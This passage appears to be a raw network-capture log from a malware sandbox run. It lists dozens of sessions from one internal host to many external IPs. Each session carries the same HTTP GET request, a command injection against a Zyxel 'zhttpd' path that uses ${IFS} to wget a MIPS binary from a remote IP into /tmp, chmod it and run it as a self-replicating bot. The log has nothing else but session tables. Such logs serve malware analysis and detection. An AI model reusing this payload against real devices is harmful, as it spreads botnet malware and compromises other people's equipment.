                                      Jan 14, 2024 15:50:06.786051989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      257192.168.2.145671485.217.43.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786128998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      258192.168.2.143841445.135.154.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786149025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      259192.168.2.1455522142.230.239.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786235094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      260192.168.2.1450934137.86.192.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786403894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      261192.168.2.1441402219.248.21.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786456108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      262192.168.2.1455984182.114.30.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786482096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      263192.168.2.1443182117.59.182.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786482096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      264192.168.2.1459960100.131.29.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786523104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      265192.168.2.1455272190.38.143.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786545992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      266192.168.2.143579054.125.129.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786617994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      267192.168.2.145147464.138.180.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786643028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      268192.168.2.1439768104.192.4.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786644936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      269192.168.2.144230081.133.112.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786668062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      270192.168.2.146048860.137.146.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786689043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      271192.168.2.1437942181.193.116.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786736965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      272192.168.2.145737837.28.154.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786742926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      273192.168.2.14410724.183.80.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754019976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      274192.168.2.1458032183.143.245.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754097939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      275192.168.2.144969070.47.67.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754127026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      276192.168.2.1449142209.212.112.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754184961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      277192.168.2.1442784155.219.120.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754252911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      278192.168.2.1452276199.247.53.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754252911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      279192.168.2.1441302206.40.148.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754262924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      280192.168.2.1442372206.209.13.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754281998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      281192.168.2.1440402139.22.51.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754339933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      282192.168.2.143769296.176.50.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754379988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      283192.168.2.1437388100.248.109.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754422903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      284192.168.2.1447052182.135.19.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.754693985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      285192.168.2.1446858210.76.149.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:07.815031052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      286192.168.2.145809213.226.19.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818600893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      287192.168.2.144682866.189.85.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818628073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      288192.168.2.146088646.41.2.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818670034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      289192.168.2.143352699.9.191.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818681002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      290192.168.2.1434024208.5.35.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818753958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      291192.168.2.1443310168.171.121.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818783998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      292192.168.2.1460102193.247.99.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818809032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      293192.168.2.143826071.197.232.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818835020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      294192.168.2.1454046121.205.178.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818886042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      295192.168.2.144788827.35.167.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818886042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      296192.168.2.1434740117.177.18.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818941116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      297192.168.2.1453968156.128.233.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.818975925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      298192.168.2.1451494113.105.42.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819019079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      299192.168.2.1436290128.0.129.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819073915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      300192.168.2.14590505.233.177.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819073915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      301192.168.2.14572788.113.21.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819144011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      302192.168.2.144270623.11.236.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819166899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      303192.168.2.145482244.246.172.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819210052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      304192.168.2.145479650.165.31.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819212914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      305192.168.2.1435796117.4.62.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819273949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      306192.168.2.1460888108.119.38.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819295883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      307192.168.2.1449794178.60.133.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819323063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      308192.168.2.1445018219.63.199.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819340944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      309192.168.2.1445304109.67.133.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819395065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      310192.168.2.1453734136.216.30.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819442987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      311192.168.2.143388058.219.146.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819468975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      312192.168.2.1437660186.128.206.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819509029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      313192.168.2.1433514128.214.109.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819523096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      314192.168.2.1436250180.162.166.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819581032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      315192.168.2.1454274162.40.170.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819637060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      316192.168.2.143468858.220.247.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819659948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      317192.168.2.1434846181.14.202.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819663048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      318192.168.2.144429648.112.185.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.819703102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      319192.168.2.1446750122.206.33.64443
                                      TimestampBytes transferredDirectionData
